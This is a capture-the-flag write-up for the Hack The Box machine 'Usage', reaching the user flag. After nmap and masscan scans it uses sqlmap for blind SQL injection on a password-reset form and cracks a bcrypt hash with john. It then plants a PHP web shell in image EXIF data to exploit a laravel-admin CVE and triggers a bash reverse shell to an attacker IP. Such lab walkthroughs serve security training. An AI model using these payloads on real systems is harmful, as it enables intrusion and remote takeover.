🔵Usage
User Flag
Enumeration
massscan & nmap & dirsearch like usual
/bin/cat masscan_10.129.36.167
<?xml version="1.0"?>
<!-- masscan v1.0 scan -->
<nmaprun scanner="masscan" start="1716243183" version="1.0-BETA" xmloutputversion="1.03">
<scaninfo type="syn" protocol="tcp" />
<host endtime="1716243183"><address addr="10.129.36.167" addrtype="ipv4"/><ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/></port></ports></host>
<host endtime="1716243303"><address addr="10.129.36.167" addrtype="ipv4"/><ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/></port></ports></host>
<runstats>
<finished time="1716243330" timestr="2024-05-21 05:15:30" elapsed="205" />
<hosts up="2" down="0" total="2" />
</runstats>
</nmaprun>/bin/cat nmap_detailed_all_tcp_ports.txt
# Nmap 7.95 scan initiated Tue May 21 05:15:56 2024 as: nmap -p "80, 22" -sVSC -A -oN nmap_detailed_all_tcp_ports.txt -v2 10.129.36.167
Nmap scan report for 10.129.36.167
Host is up, received echo-reply ttl 63 (0.044s latency).
Scanned at 2024-05-21 05:15:57 WIB for 9s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFfdLKVCM7tItpTAWFFy6gTlaOXOkNbeGIN9+NQMn89HkDBG3W3XDQDyM5JAYDlvDpngF58j/WrZkZw0rS6YqS0=
| 256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHr8ATPpxGtqlj8B7z2Lh7GrZVTSsLb6MkU3laICZlTk
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=5/21%OT=22%CT=%CU=34514%PV=Y%DS=2%DC=T%G=N%TM=664BCBA6
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11
OS:NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Uptime guess: 42.218 days (since Tue Apr 9 00:02:51 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 51.32 ms 10.10.14.1
2 51.48 ms 10.129.36.167
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 21 05:16:06 2024 -- 1 IP address (1 host up) scanned in 9.89 secondstesting all features. we know sqli in the /forgot_password
Exploitation
Blind sqli boolean based in /forgot_password on port 80 in the email section
sqlmap -r ~/Desktop/Prod/HackTheBox/machine/Usage/req.txt --batch --level 5 --risk 3 --dbms=mysql --dbs --dumpgot the dump of all db
lets input to password cracker
john Administrator.hash --wordlist=/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
whatever1 (?)
1g 0:00:00:04 DONE (2024-05-21 06:56) 0.2347g/s 380.2p/s 380.2c/s 380.2C/s runescape..serena
Use the "--show" option to display all of the cracked passwords reliably
Session completedafter sometimes
we know this laravel-admin. now we find the public cve for this and i search "laravel-admin cve" and i found this CVE-2023-24249
convert -size 25x25 xc:none -colors 256 output.png && exiftool -Model='<?=system($_GET["x"])?>' output.png && mv output.png $(cat /proc/sys/kernel/random/uuid).pngafter that we upload and intercept and make it .png.php
and we get the shell
and then we revshell
http://admin.usage.htb/uploads/images/exploit.png.php?x=bash%20-c%20%22sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.45%2F1337%200%3E%261%22and then we go to /home/dash and we get user flag
Last updated
